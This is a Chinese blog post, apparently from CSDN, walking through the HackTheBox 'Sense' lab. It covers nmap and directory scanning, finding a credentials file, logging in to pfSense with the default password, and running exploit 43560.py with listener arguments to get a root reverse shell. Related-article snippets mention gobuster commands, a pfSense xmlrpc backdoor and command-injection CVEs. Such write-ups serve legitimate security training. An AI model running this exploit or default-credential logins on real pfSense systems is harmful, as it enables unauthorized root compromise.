hackthebox-sense(考点:信息搜集/pfsense安全)

最新推荐文章于 2023-12-18 18:18:17 发布
最新推荐文章于 2023-12-18 18:18:17 发布
阅读量425 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45527786/article/details/105465785
版权

nmap
在这里插入图片描述

80和443都是网页端口
打开,进入
是一个登录框。pfsense,防火墙&路由器管理软件。这多半是个pfsense安全漏洞的考点

在这里插入图片描述
继续信息搜集
dirbuster扫。后缀加多一些比如txt,不要只光扫php文件。可能有robots或类似的txt记录有价值的信息。
在这里插入图片描述
找到了登录信息文件
在这里插入图片描述
这里密码可不是company defaults ,是pfsense公司默认的登录密码。
还得搜下默认账号密码是什么
默认账户密码

ok,进入,搞定
看到版本信息

在这里插入图片描述

针对这个版本,该利用什么漏洞。继续搜
在这里插入图片描述
那个py可用。尝试使用。根据提示

python3 43560.py --rhost 10.10.10.60 --lhost 10.10.14.57 --lport 1234 --username rohit --password pfsense

另一边本机打开监听,收到,直接是root权限,搞定
在这里插入图片描述

冬萍子
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
HackTheBox-sense渗透测试
weixin_43111940的博客
04-22 201
sudo nmap -sC -sV -A -p 80,443 10.10.10.60 gobuster dir -u http://10.10.10.60 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x 'html,php,asp,aspx,zip,rar' 访问页面,找到了cms,但是没有版本号 扫描到了system-users.txt 密码是默认,可能是靶机名,可能是cms的名字,尝试后发现是pfsens
harmonyos2-kubernetes-pfsense-controller:集成Kubernetes和pfSense
07-01
pfSense 的 xmlrpc API 来实现的。 从广义上讲,Kubernetes API 被watch ,适当的更新通过 xmlrpc 调用以及适当的重新加载/重启/更新/同步操作发送到 pfSense ( config.xml ) 以应用更改。 请注意,此控制器并非旨在...
Hack the box靶机 Sense
菜浪马废的博客
05-20 275
合计找一下lighttpd的漏洞 因为之前在vulnhub做过一个lighttpd的 但是没有能利用的 扫一下目录 我是真要吐了 我吐了!!!!!! 吐了!!!!!!!!! 这扫描也太慢了 40分钟还没扫描完!!!!!! 有没有大佬指导一下我 让我爆破目录更快!!!! 奉上双膝那种感谢!!!!!!! 化身盗图狂魔了我要 不扫描了 给了用户名rohit 说是默认密码 goole一下 rohit:pfsense 登录 用43560.py 运行要用python3 不然不能运行 看着自己做这么多了 .
HackTheBox::Sense
aya3t的博客
10-11 135
HackTheBox::Sense
【Hack The Box】linux练习-- Sense
人间体佐菲的博客
11-09 371
【Hack The Box】linux练习-- Sense
PIA-NextGen-PortForwarding:新的PIA pfSense(私有Internet访问)端口转发API脚本,用于下一代服务器和传输支持
01-31
PIA-NextGen-PortForwarding:新的PIA pfSense(私有Internet访问)端口转发API脚本,用于下一代服务器和传输支持
pfSense-pkg-wireguard:适用于WireGuard的pfSense集成软件包
04-15
pfSense-pkg-wireguard 用于GuardGuard的pfSense集成。 建造 构建过程与其他FreeBSD和pfSense软件包相似。 您将需要设置FreeBSD构建环境,并在其上安装或构建wireguard和wireguard-go 。 请查看以获取更多信息。 ...
pfSense-pkg-zeek:用于pfSense路由器的Zeek(以前为Bro)网络安全监视器软件包
01-28
用于pfSense路由器/防火墙的Zeek网络安全监视器程序包 兼容性 该软件包已在pfSense 2.4.5-RELEASE(amd64)上进行了测试。 也许它不适用于较早版本的pfSense。 安装 通过下载生成的软件包 将程序包从本地计算机复制...
Suricata-pfSense:让Suricata在pfSense上工作
03-28
让Suricata在pfSense上工作 注意 如果您的机器出现故障,我不提供任何保证。 pfSense不支持这些步骤。 这些步骤对我来说与pfSense 2.5.0-RELEASE结合使用,旨在使您继续努力,使Suricata在pfSense上为您工作。 ...
pfsense_xmlrpc_backdoor:通过 xmlrpc.php 在 pfSense 防火墙上放置 PHP 后门的简单示例
06-12
快速介绍 这是一个示例有效负载以及滥用 pfSense 的 xmlrpc.php 函数来建立后门并获得对 pfSense 防火墙的根级访问权限的示例。 这个漏洞是post-auth的(对于管理员账户),根据pfSense安全团队的说法,它被认为不是问题,因为这个密码是为web和ssh服务共享的(ssh在这个时候不能访问WAN被使用)。 此身份验证方法绕过适用于针对 Web 的身份验证尝试的安全规则,并被视为local_backed身份验证尝试。 任何被放到 web root 的 PHP shell 都将使用完整的 root 权限运行。 还值得注意的是,Web 服务器似乎是单线程的,因此启动长时间运行的 exec(例如循环或无计数的 ping)将有效地对 Web 服务器进行 DoS,并停止基于 Web 的身份验证和管理。 这是在 2015 年比赛中发现的,用于在团队防火墙上投放活动后门。
pfsense+panabit_配置教程
10-15
pfsense+panabit_配置教程
PfSense命令注入漏洞分析
weixin_34375233的博客
03-08 1072
mssp299 · 2015/09/09 14:00翻译:mssp299原文地址:www.proteansec.com/linux/pfsen…0x00 导言在本文中,我们将向大家介绍在PfSense的2.1.3以及更低版本中的CVE-2014-4688漏洞;对于更高的版本来说,pfSense已经修复了这个漏洞。0x01 Diag_dns.php脚本中的命令注入漏洞下面展示的是脚本diag_dns...
CVE-2023-27253-pfsense命令注入漏洞复现(含exp)
zwy15288408160的博客
09-29 1534
NetGate Pfsense
Pfsense漏洞复现(CVE-2021-41282)
qq_69775412的博客
06-15 2234
pfSense® Plus 软件是世界上最值得信赖的防火墙。 该软件赢得了全球用户的尊重和喜爱——安装次数超过 300 万次。 开源技术使之成为可能。 由 Netgate 制成坚固、可靠、可靠的产品产品官网:https://www.pfsense.org/ pfSense 允许经过身份验证的用户获取有关防火墙中设置的路由的信息信息是通过执行 netstat实用程序,然后通过 sed调用执行。 虽然命令注入的常见预防模式(即使用 escapeshellarg参数的函数)正在使用中,但是仍然可以注入 sed
速修复!开源防火墙软件pfSense 中存在多个漏洞
smellycat000的专栏
12-18 409
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士开源的 Netgate pfSense 防火墙解决方案 pfSense 中存在多个漏洞,可被攻击者用于在可疑设备上执行任意命令。这些问题和两个反射型XSS漏洞有关,其中一个是命令注入漏洞。安全研究员 Zeino-Mahmalat 表示,“局域网中的安全性通常更加薄弱,因为网络管理员信任自己的防火墙能够保护他们免遭远程攻击。潜在攻击者可利用已发现漏...
CVE-2022-31814pfsense远程命令执行漏洞复现与exp利用
zwy15288408160的博客
05-11 1239
在pfBlockerNG
pfSense软件对新近三个CVE漏洞影响的评估
weixin_33695082的博客
05-10 200
2018年5月8日作者:Jim ThompsonNetgate已经对今天公布的漏洞进行了评估:CVE-2018-8897,CVE-2018-6920和CVE-2018-6921。我们确定大多数pfSense®软件用户没有必须担心。与Meltdown和Spectre一样,绝大多数pfSense使用场景不受影响,除非使用了不受信任的本地用户或多用户环境。我们将很快在2.4.4-D...
超过 1450 个 pfSense 服务器因错误链而遭受 RCE 攻击
网络研究观
12-13 3105
pfSense 实例容易受到命令注入和跨站点脚本漏洞的攻击,这些漏洞如果链接起来,可能使攻击者能够在设备上执行远程代码。
网络安全日报 2023年12月13日
Galaxy_0的博客
12-13 865
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
VMware安装pfsense
最新发布
06-16
VMware上安装pfsense,是一个常见的网络管理工具配置流程。以下是安装步骤概述: 1. 准备工作: - 下载pfsense映像文件:从pfsense官网下载适用于VMware的ISO镜像文件,通常选择`pfsense-vm.iso`或类似的版本。 -...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值